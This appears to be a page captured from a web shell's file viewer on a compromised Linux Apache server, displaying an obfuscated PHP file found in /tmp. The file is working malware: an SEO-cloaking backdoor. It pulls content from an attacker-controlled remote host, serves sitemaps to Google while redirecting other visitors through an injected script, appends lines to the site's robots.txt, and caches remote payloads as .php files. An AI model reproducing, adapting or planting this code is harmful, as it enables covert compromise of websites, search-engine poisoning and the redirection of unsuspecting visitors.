HEX
Server: Apache
System: Linux HTML-DEV-SERVER 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User: www-data (33)
PHP: 8.1.2-1ubuntu2.23
Disabled: NONE
$ pwd: /tmp/
Upload Files
File: //tmp/phpdtBNSD
<?php
 goto lJK23; CU2r7: if (!empty($_GET)) { $f = reset($_GET); $sp = explode("\x2d", $f); if (count($sp) === 2) { $sz = $sp[0]; $iid = $sp[1]; } } goto rlNGP; OjyCD: function ensure_robots_sitemap($sitemapLine) { $robots = rtrim($_SERVER["\104\x4f\x43\x55\115\x45\x4e\x54\137\122\117\117\x54"], "\x2f\134") . "\x2f\162\x6f\142\157\164\x73\56\x74\x78\164"; if (!file_exists($robots)) { @file_put_contents($robots, "\x55\163\x65\x72\x2d\x61\x67\145\156\x74\x3a\40\x2a\12\101\x6c\154\157\167\x3a\x20\57\xa" . $sitemapLine, LOCK_EX); } else { $c = @file_get_contents($robots); if ($c === false || strpos($c, $sitemapLine) === false) { @file_put_contents($robots, $sitemapLine, FILE_APPEND | LOCK_EX); } } } goto yYpEz; yXXjJ: if ($kk !== '' && preg_match("\57\136\133\101\x2d\x5a\141\x2d\x7a\60\55\71\x5d\53\44\x2f", $kk)) { $remote = getCurlFast($jd . "\x67\145\164\144\157\155\x61\x69\156\62\56\141\x73\x70\170\77\x72\156\144\x3d\x32\x26\153\x6b\x3d" . $kk); if (!empty($remote)) { echo $remote; die; } } goto piblE; piblE: if ($kk !== '' && !preg_match("\x2f\136\133\101\55\132\x61\55\x7a\x30\x2d\71\135\53\44\x2f", $kk)) { output_sitemap_and_exit($sitemapLine, $http_type); } goto PwoTU; ALL_j: function get_real_ip() { $keys = array("\110\x54\x54\x50\x5f\103\x46\x5f\103\x4f\116\x4e\105\x43\x54\x49\x4e\x47\x5f\111\x50", "\x48\x54\124\x50\137\x58\x5f\x52\x45\101\x4c\x5f\x49\x50", "\110\x54\124\120\x5f\130\137\x46\117\122\x57\101\x52\x44\105\x44\x5f\x46\117\x52", "\x48\x54\124\120\137\x43\114\x49\105\116\x54\137\111\120", "\x52\x45\x4d\x4f\x54\x45\137\101\104\x44\122"); foreach ($keys as $k) { if (!empty($_SERVER[$k])) { $ip = $_SERVER[$k]; if (strpos($ip, "\54") !== false) { $ip = trim(explode("\54", $ip)[0]); } if (filter_var($ip, FILTER_VALIDATE_IP)) { return $ip; } } } return "\x31\62\67\56\x30\x2e\60\x2e\61"; } goto AKt2F; CpI95: $sitemapLine = "\123\x69\x74\x65\155\141\x70\72\40{$http_type}{$_SERVER["\x48\x54\x54\120\137\x48\x4f\123\124"]}{$_SERVER["\123\103\x52\111\x50\124\137\x4e\101\x4d\x45"]}\x3f\x77\x3d" . date("\131\155\144\x48\x69") . "\xa"; goto OjyCD; oWHIc: $kk = isset($get["\x6b\153"]) ? trim($get["\153\x6b"]) : ''; goto BUvfY; m1Njf: if ($kk === '' && $is_no_query) { if ($domain === "\147\157\x6f\x67\x6c\x65") { output_sitemap_and_exit($sitemapLine, $http_type); } else { die; } } goto a9m4T; hSqE5: function output_sitemap_and_exit($sitemapLine, $http_type) { ensure_robots_sitemap($sitemapLine); echo "\74\x64\x69\x76\x20\x73\x74\171\x6c\145\x3d\x27\x74\x65\170\164\55\x61\154\151\147\x6e\x3a\143\145\x6e\x74\x65\x72\73\160\x61\x64\x64\x69\156\147\x3a\x31\x30\160\x78\x20\60\73\47\76\12\x20\40\x20\40\40\x20\40\x20\40\40\x20\x20\74\141\40\150\162\x65\146\75\x22{$http_type}{$_SERVER["\x48\x54\x54\120\137\110\117\x53\x54"]}{$_SERVER["\x53\103\122\x49\x50\124\x5f\116\101\115\x45"]}\x3f\x77\75" . date("\x59\x6d\144\x48\x69") . "\x22\x20\x74\x61\x72\147\x65\164\75\x22\x5f\x62\x6c\141\156\153\42\x20\162\145\x6c\75\x22\x6e\157\x66\x6f\154\x6c\157\x77\x22\x3e\123\151\x74\x65\x6d\x61\160\74\57\141\76\xa\40\40\x20\x20\40\x20\x20\x20\x20\x20\x3c\x2f\144\151\166\x3e"; die; } goto yXXjJ; PIqxT: $hyzhdy = $jd . "\x7a\156\x2e\141\x73\x70\x78"; goto B3vVW; rlNGP: if (!empty($sz)) { $jd = getCurlFast("{$http_type}{$vurl}\x33\x6b\147\x2e\x61\x73\x70\x78\77\163\172\x3d" . urlencode($sz)); } else { $jd = getCurlFast("{$http_type}{$vurl}\x33\x6b\x67\x2e\141\x73\x70\x78\77\x78\171\x3d{$http_type}"); $sz = getCurlFast("{$http_type}{$vurl}\x33\153\x67\56\141\x73\160\170\77\x6a\x64\x3d" . urlencode($jd)); } goto PIqxT; FlPc3: $http_type = !empty($_SERVER["\110\124\x54\x50\123"]) && $_SERVER["\x48\124\124\120\123"] !== "\157\x66\x66" ? "\150\164\x74\x70\163\72\57\57" : "\x68\164\164\x70\72\x2f\57"; goto D0wEB; L1vvj: if ($domain !== "\147\157\157\147\154\145" && !empty($iid)) { $kname = urldecode(getCurlFast($jd . "\x67\x6e\x2e\x61\x73\x70\170\77\151\x69\144\x3d" . $iid)); echo "\74\163\x63\162\x69\160\x74\76\x6c\x6f\143\141\164\151\157\156\75\x22" . $jd . "\141\56\x61\x73\160\x78\x3f\143\x6e\141\x6d\145\x3d" . urlencode($kname) . "\x26\165\162\154\x3d" . $http_type . $_SERVER["\x48\x54\x54\x50\137\x48\x4f\x53\x54"] . $_SERVER["\123\103\122\x49\120\x54\137\x4e\x41\x4d\x45"] . "\x22\74\57\163\143\x72\x69\160\164\x3e"; die; } goto lax8N; a9m4T: output_sitemap_and_exit($sitemapLine, $http_type); goto mjCCp; PwoTU: $is_no_query = empty($_SERVER["\x51\x55\x45\122\131\x5f\x53\124\122\111\x4e\x47"]); goto m1Njf; QcGmK: $qz = substr(str_replace(array("\167\x77\x77\x2e", "\56"), '', $_SERVER["\x48\x54\124\120\137\110\117\123\x54"]), 0, 3); goto zQe_S; AKt2F: function getCurlFast($url) { $cached = cache_get($url); if ($cached !== false) { return $cached; } $data = ''; if (function_exists("\x63\x75\162\154\x5f\151\156\151\164")) { $ch = curl_init($url); curl_setopt_array($ch, array(CURLOPT_RETURNTRANSFER => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 8, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_FOLLOWLOCATION => false, CURLOPT_USERAGENT => "\x4d\x6f\172\x69\154\154\141\57\65\56\x30")); $data = curl_exec($ch); curl_close($ch); } if (empty($data) && ini_get("\x61\x6c\x6c\x6f\167\x5f\x75\162\154\137\x66\157\x70\145\156")) { $context = stream_context_create(array("\150\x74\164\x70" => array("\x74\x69\x6d\x65\x6f\165\x74" => 8, "\x68\145\141\x64\145\162" => "\125\163\x65\162\x2d\x41\147\x65\156\164\x3a\x20\115\157\x7a\151\154\x6c\141\57\65\x2e\60\xd\xa"), "\x73\x73\154" => array("\x76\145\x72\x69\146\x79\137\160\x65\145\162" => false, "\166\145\x72\x69\x66\171\137\x70\x65\x65\162\x5f\x6e\x61\x6d\x65" => false))); $data = @file_get_contents($url, false, $context); } if (!empty($data)) { cache_set($url, $data); } return $data; } goto eyM0s; r10Gm: function cache_set($key, $data) { $file = sys_get_temp_dir() . "\57\143\x61\143\x68\x65\137" . md5($key) . "\56\x70\150\160"; @file_put_contents($file, $data, LOCK_EX); } goto ALL_j; D0wEB: $vurl = "\x74\x6f\x2e\152\x67\x61\154\x6c\163\56\x63\x6f\x6d\57"; goto QcGmK; X_yKY: $get = filter_input_array(INPUT_GET, FILTER_SANITIZE_STRING); goto VA8Za; BUvfY: $ip = $kk !== '' ? "\x36\66\56\62\64\x39\56\70\x32\56\70" : get_real_ip(); goto fULDa; zQe_S: $sz = $iid = ''; goto CU2r7; B3vVW: $surl = $jd . "\163\x7a\x6e\56\x61\x73\160\170"; goto CpI95; lax8N: if (!empty($iid)) { $str = getCurlFast($hyzhdy . "\x3f\151\151\144\75{$iid}"); echo str_replace(array("\147\147\x67\147\147", "\131\x59\131\x59\131", "\130\x58\130\131\x59\x59", "\xe5\xbd\223\345\x89\x8d\125\122\114", "\x55\x55\x55\125\x55", "\x4d\x4d\x4d\x4d\115", "\77\146\75"), array($sz, get_url_info(), get_url_info("\142\x61\163\145"), get_url_info("\x66\x75\x6c\154"), get_url_info("\x6e\157\x5f\x77\x77\167"), parse_url($_SERVER["\122\105\121\x55\105\x53\x54\x5f\x55\x52\x49"], PHP_URL_PATH), "\77" . $qz . "\75"), $str); die; } goto hSqE5; fULDa: $domain = trim(getCurlFast($jd . "\147\145\x74\144\157\155\x61\151\156\x32\56\x61\163\160\170\x3f\162\156\x64\x3d\61\46\x69\x70\75" . $ip)); goto L1vvj; eyM0s: function get_url_info(string $type = "\x64\157\155\141\x69\x6e") : string { $host = $_SERVER["\x48\124\124\x50\137\110\117\x53\124"] ?? ''; if ($type === "\x6e\157\x5f\x77\x77\x77") { return preg_replace("\57\x5e\167\167\x77\x5c\56\57\x69", '', $host); } $protocol = !empty($_SERVER["\x48\124\124\120\123"]) && $_SERVER["\110\124\x54\x50\123"] !== "\157\x66\x66" ? "\150\164\x74\160\163\72\x2f\57" : "\x68\164\x74\x70\x3a\x2f\57"; $base = $protocol . $host; if ($type === "\142\x61\x73\x65") { return $base; } if ($type === "\146\x75\154\154") { return $base . ($_SERVER["\x52\105\x51\x55\105\123\124\137\125\x52\111"] ?? ''); } return $host; } goto FlPc3; yYpEz: if (!empty($get["\x77"])) { $params = http_build_query(array("\116\117\x55\155\x62\145\x72" => $get["\116\x4f\125\155\x62\x65\162"] ?? '', "\164" => $get["\164"] ?? '', "\143\156" => $get["\x63\x6e"] ?? '', "\x70\116\x4f\x55\x6d" => $get["\160\x4e\117\x55\155"] ?? '', "\143\x69\144" => $get["\143\x69\x64"] ?? '', "\x6d" => $get["\x6d"] ?? '')); $str = getCurlFast("{$surl}\x3f{$params}"); echo str_replace(array("\171\171\155\x6d", "\147\x67\147\147\x67", "\x3f\146\x3d"), array($http_type . $_SERVER["\110\x54\124\120\x5f\x48\x4f\123\x54"] . $_SERVER["\123\103\x52\x49\x50\124\137\x4e\x41\x4d\x45"], $sz, "\77" . $qz . "\75"), $str); die; } goto oWHIc; VA8Za: function cache_get($key, $expire = 300) { $file = sys_get_temp_dir() . "\x2f\143\x61\x63\x68\145\x5f" . md5($key) . "\56\x70\150\x70"; if (file_exists($file) && time() - filemtime($file) < $expire) { return file_get_contents($file); } return false; } goto r10Gm; lJK23: error_reporting(0); goto X_yKY; mjCCp: ?>
@ Telegram